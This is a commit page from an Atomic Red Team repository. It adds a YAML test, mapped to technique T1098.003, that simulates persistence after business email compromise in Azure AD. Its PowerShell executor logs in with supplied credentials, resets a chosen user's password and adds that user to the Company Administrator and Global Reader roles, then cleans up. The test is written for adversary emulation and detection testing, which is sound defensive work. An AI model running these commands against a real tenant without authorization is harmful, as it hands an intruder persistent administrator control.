security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Adding Simulate - Post BEC persistence via user password reset followed by user added to company administrator role

Browse Source
This commit is contained in:
blueteam0ps
2023-08-26 05:44:16 -07:00
parent 51f01c9695
commit 48702a9d62
1 changed files with 76 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1098.003/T1098.003.yaml
+76
View File
@@ -39,3 +39,79 @@ atomic_tests:
Remove-MsolRoleMember -RoleName "Company Administrator" -RoleMemberType User -RoleMemberEmailAddress "#{target_user}"
name: powershell
elevation_required: false
- name: Simulate - Post BEC persistence via user password reset followed by user added to company administrator role
auto_generated_guid: 14f3af20-61f1-45b8-ad31-4637815f3f44
description: |
This test looks at simulating the an adversary described in the following blog post. It involves resetting the password of a normal user and adding to the company administrator role within M365.
Reference: https://www.huntress.com/blog/business-email-compromise-via-azure-administrative-privileges
supported_platforms:
- azure-ad
input_arguments:
auth_username:
description: Azure AD username used to conduct the adversary activity
type: string
default: jonh@contoso.com
auth_password:
description: Azure AD password for user auth_username
type: string
default: p4sswd
target_user:
description: Name of the user whose password be reset and added to the admin role.
type: string
default: default
target_password:
description: The password that the user target_user will be reset to.
type: string
default: Ohn05GeMe#$
dependency_executor_name: powershell
dependencies:
- description: |
MSOnline and AzureAD modules must be installed.
prereq_command: |
$required_mods = 'AzureAD', 'MSOnline'
$installed_mods = @((Get-Module $required_mods -ListAvailable -ErrorAction SilentlyContinue).Name | Select-Object -Unique)
$notInstalled = Compare-Object $required_mods $installed_mods -PassThru -ErrorAction SilentlyContinue
if ($notInstalled) {
# Prompt for installing the missing ones.
Write-Output "The following PS modules aren't currently installed:"
$notInstalled
exit 1
}
else{
Write-Output "All required PS modules are installed"
exit 0
}
get_prereq_command: |
Install-Module -Name MSOnline -Scope CurrentUser -Force
Install-Module -Name AzureAD -Scope CurrentUser -Force
executor:
command: |
Import-Module MSOnline
Import-Module AzureAD
$password = ConvertTo-SecureString -String "#{auth_password}" -AsPlainText -Force
$credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{auth_username}", $password
$targetsecurepw = ConvertTo-SecureString -String "#{target_password}" -AsPlainText -Force
Connect-MsolService -Credential $credential -ErrorAction:SilentlyContinue
Connect-AzureAD -Credential $credential -ErrorAction:SilentlyContinue
#Saving the ObjectId of the target_user into a variable
$target_objid = Get-AzureADUser -filter "userPrincipalName eq '#{target_user}'" | Select-Object -ExpandProperty ObjectId
#Reset the password of the target_user
Set-AzureADUserPassword -ObjectId $target_objid -Password $targetsecurepw -ErrorAction:SilentlyContinue
#Adding target_user
Add-MsolRoleMember -RoleName "Company Administrator" -RoleMemberEmailAddress "#{target_user}"
Add-MsolRoleMember -RoleName "Global Reader" -RoleMemberEmailAddress "#{target_user}"
cleanup_command: |
Import-Module MSOnline
$password = ConvertTo-SecureString -String "#{auth_password}" -AsPlainText -Force
$credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{auth_username}", $password
Connect-MsolService -Credential $credential
Remove-MsolRoleMember -RoleName "Company Administrator" -RoleMemberType User -RoleMemberEmailAddress "#{target_user}"
Remove-MsolRoleMember -RoleName "Global Reader" -RoleMemberType User -RoleMemberEmailAddress "#{target_user}"
name: powershell
elevation_required: false